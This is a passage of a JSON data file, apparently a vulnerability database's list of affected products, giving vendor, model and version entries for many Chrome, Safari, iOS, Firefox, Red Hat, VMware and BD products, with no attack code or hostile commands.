      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.744.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1.2"
      },
      {
        "_id": null,
        "model": "internet explorer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "10"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.35"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.31"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "25.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.45"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "57.0.2987.133"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.74"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1078.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.18"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.116"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.328.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.64"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.24"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.91"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.67"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.381.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.144"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.9.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.102"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1283.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.25"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.711.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.109"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.330"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.21"
      },
      {
        "_id": null,
        "model": "malware analysis appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "4.2"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.79"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.87"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.511.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.61"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.686.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.56"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.147"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.797.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.14443"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.521.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.59"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.46"
      },
      {
        "_id": null,
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.68"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.0"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.774.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.34"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.458.2"
      },
      {
        "_id": null,
        "model": "watchos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.350.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.50"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.803.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.49"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.155"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.41"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.623.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.51"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.21"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.49"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.345.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.1"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.57"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.215"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.23"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.88"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1001.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.21"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.859.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.686.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1674.1"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.930.0"
      },
      {
        "_id": null,
        "model": "pyxis specimen collection verification",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.6"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.51"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.50"
      },
      {
        "_id": null,
        "model": "windows server r2 for x64-based systems sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.562.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.9"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.4"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "51"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "55.0.2883.75"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.798.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.227"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.302"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.416.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1077.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.63"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.3.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.59"
      },
      {
        "_id": null,
        "model": "gencell clic",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.85"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.111"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.647.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "59.0.3071.115"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.937.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.90"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.123"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.26"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.77"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.25"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.277.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.3"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.34"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.71"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.30"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.350.1"
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-6.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.136"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.27"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "50"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.12"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.50"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.867.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.120"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.329"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.25"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.42"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.26"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.746.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.70"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.38"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.12"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.19"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1287.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.50"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.753.0"
      },
      {
        "_id": null,
        "model": "chrome beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.59"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.53"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.92"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.42"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.61"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1038.0"
      },
      {
        "_id": null,
        "model": "identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "2.7.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.288.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.7"
      },
      {
        "_id": null,
        "model": "phoenix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "bactec fx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.496.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.109"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.294.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.728.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.65"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.85"
      },
      {
        "_id": null,
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.5.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1036.7"
      },
      {
        "_id": null,
        "model": "chrome beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.824.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.706.0"
      },
      {
        "_id": null,
        "model": "lyse wash assistant",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.43"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.453.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.35"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.25"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.933.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.585.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.68"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.557.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.91"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.80"
      },
      {
        "_id": null,
        "model": "enterprise linux eus compute node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.85"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.549.0"
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.12.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.88"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.466.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.111"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.13"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.314.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.207"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.440.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.343.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1053.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.957.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1.4"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.2.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
